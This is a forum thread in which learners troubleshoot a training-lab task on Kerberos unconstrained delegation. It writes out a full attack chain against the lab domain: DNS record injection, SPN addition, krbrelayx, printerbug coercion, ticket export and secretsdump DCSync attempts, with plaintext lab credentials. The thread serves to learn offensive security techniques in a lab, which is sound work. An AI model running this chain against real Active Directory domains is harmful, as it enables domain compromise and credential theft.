hi all. I beg you, help me, encourage me to the correct answer. I am running the “KERBEROS ATTACKS” module. I ran into difficulties in the “Unconstrained Delegation - Users” section. I need help solving a task, maybe I’m doing something wrong or I misunderstood the task and am applying the data from the task

callum.dixon:C@lluMDIXON has an unrestricted delegation set, and carole.rose:jasmine has a universal write on top of callum.dixon. Using this information, try to compromise the domain and read the contents of C:\flag.txt on DC01.

so let’s go in order what I do

1. fake dns

I add to /etc/hosts roguecomputer.inlanefreight.local
python dnstool.py -u INLANEFREIGHT.LOCAL\\carole.rose -p jasmine -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.99.99.99 --action add 10.129.205.35

2. create the SPN of the target user (callum.dixon)

python addspn.py -u inlanefreight.local\\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

3. Run krbrelay.py with the password callum.dixon

python krbrelayx.py -p C@lluMDIXON

4. Run printerbug.py as carole.rose to get the ticket

python printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local
and I catch the carole.rose ticket in the session where krbrelayx.py is running

5. Exporting the ticket

export KRB5CCNAME=./DC01\$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache

6. I’m trying to reset hashes using secretdump.py to get the admin hash and I get an error

secretsdump.py -k -no-pass dc01.inlanefreight.local
Impacket v0.12.0.dev1+20230907.33311.3f645107 - Copyright 2023 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...

Okay, we understand that it may not be possible to perform DCSync. So I thought about stealing the flag using SMB, but it didn’t work, I just got an error using the Kerberos ticket “[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused”. But if you connected with credentials, then naturally you got access, but not to the C drive :')
Please help me with the task.

@Alt_F4 What command you are using to connect to 10.129.205.35 machine.? Could you please help me with this?

hi @tigerboy, if you connect without a ticket, you can connect using credentials using the following command:

smbclient.py carole.rose@dc01.inlanefreight.local

But this will not give you anything, because we need to get the admin hash and we need to carry out an attack like in the section to reset the hashes.
if we add options (-k -no-pass) to the command above then we will get an error “[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused”

Well, if we reset the hash for a specific user, we will get a combo of the errors above

secretsdump.py -k -no-pass dc01.inlanefreight.local -just-dc-user administrator
Impacket v0.12.0.dev1+20230907.33311.3f645107 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

@tigerboy Hello. I decided and pulled the flag. I had to combine the attack of this part and the previous task. I still don’t understand what the problem is with the Kerberos error in this module. In general, my solution is just take the admin hash from the previous task and try to connect using some kind of
impacket module. Good luck!

Have you made any changes into system before running above command. I am not receiving connection refused error in the response.

try adding additional options. Use -h to figure out what you need. Pay attention to the target and ip options

Same problems as you when trying to perform a DC Sync.
Used NT Hash from previous task in the end.
Anyone was able to complete this task following the instructions?

was anyone able to get the flag? i have the same problem? what is the alternative? i have tried 2 different impakcet tools ,but still not able to access dc01

smbclient.py should work. Of course it’s not the intended way. I have tried to open an issue with Support about this task, asking them to investigate why DC Sync does not work

Thanks for replying.

I tried using smbclient.py ,but ti didnt work. i use for administrator account from the last activity and for the dc01$ ,but none work. for carolone it gives no results back. May i ask you the syntax you used?
thank you

replied privately